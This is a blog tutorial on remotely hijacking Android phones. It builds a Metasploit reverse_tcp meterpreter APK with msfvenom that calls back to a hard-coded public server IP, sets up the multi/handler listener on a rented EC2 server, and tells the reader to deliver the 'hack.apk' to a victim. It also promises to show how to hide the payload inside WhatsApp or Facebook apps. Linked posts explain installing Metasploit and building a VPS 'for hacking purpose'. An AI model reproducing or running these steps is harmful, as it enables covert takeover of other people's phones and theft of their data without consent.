Skip to main content

[No Portforwarding] How to hack Android Mobile Using Metsploit ( Over WAN using VPS)

[No Portforwarding] How to hack Android Mobile Using Metsploit ( Over WAN using VPS)

Hello people,
If you are facing problem in Port Forwarding, No-Ip hosting..etc then you are at right place...
because in this technique we will use our VPS [how to create VPS see my tutorial here]
In this tutorial we will hack android mobile over WAN using our VPS(Virtual Private Server).
Lets Begin:


  • First of All you need to see this 3 Tutorials On :
  1. how to create AWS amazon account. [click here]
  2. how to create EC2 (VPS) on ammazon. [click here]
  3. how to install metasploit on EC@ (VPS). [click here]
  • now connect to your EC2(VPS) usig puTTY.exe
  • type this command in terminal to create payload 
  • msfvenom -p android/meterpreter/reverse_tcp LHOST=54.71.89.249 R > hack.apk
  • Here lhost will be your EC2 (VPS) public IP address (in my case it is 54.71.89.249)(see image)

  • by this command you will create apk named "hack.apk".
  • Now you have to transfer this apk to your victim BY coping it on to your apache2 server folder.
  • or you may use other Offline Linux system to create your payload ..and then send that apk ...
  • To start metasploit type in "msfconsole".
  • then type " use exploit/multi/handler"
  • then type " set payload android/meterpreter/reverse_tcp "
  • then type" set LHOST 54.71.89.249" it may be diffrent in your case (see image)

  • then type "set ReverseListenerBindAddress 172.31.6.246" now this is your local address provided to your EC2 (VPS) (see image)

  • and last just type " exploit " .
  • when ever your victim open your apk he will be hacked.....
Note ;- In this case if your victim closes that apk then you may lose your victim...therefore in my next tutorial i will teach you how to bind your apk in other apk like {whatsapp,facebook,.etc} and make your victim persistence throught.


Comments

Popular posts from this blog

How to install Metasploit on Ubuntu or Ubuntu (VPS)

How to install Metasploit on Ubuntu or Ubuntu (VPS) First of all connect to your EC2 Instance . You may see Tutorial On how to create and connect to EC2 (VPS). SEE TUTORIAL. Installing Metasploit :- After connecting to your EC2 just copy and paste the code from below ↓↓↓↓. wget https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run && wget https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1 && echo $(cat metasploit-latest-linux-x64-installer.run.sha1)' 'metasploit-latest-linux-x64-installer.run > metasploit-latest-linux-x64-installer.run.sha1 && shasum -c metasploit-latest-linux-x64-installer.run.sha1 && chmod +x ./metasploit-latest-linux-x64-ins taller.run && sudo ./metasploit-latest-linux-x64-installer.run Now follow the on Screen instruction and JUST press ENTER and "Y".  When ever asked. it will ask you folder to install

How to create Amazon EC2 (VPS) for Hacking Purpose

How to create Amazon EC2 (VPS) for Hacking Purpose To create EC2 on Amazon you mus have an account on Amazon AWS. You can see my tutorial on creating account on Amazon AWS. → Watch Tutorial Now Steps to create EC2 :- 1. After successful login to your Amazon AWS account Click on Services (seeimage) and then EC2 . 2.Then click on Launch Instance . (see image) 3.On next Page you have to choose AMI (Amazon Machine Image) (See image). 4. There are many AMI. I will recommend to use  Ubuntu Server 16.04 (64-bit) by scrolling the page. 5. Now click SELECT. ...  On next Step 2 , Choose Instance Type (see image)...must select free tier eligible. 6. note:- donot launch it now.... Click on "Next:Configure Instance Details".(important point) 7. Now new page will open. Donot change any think and click next and skip step 4 and 5.     to " Configure Security Group".  (See image). 8.On this page Click on Add Rule (see image). 9.After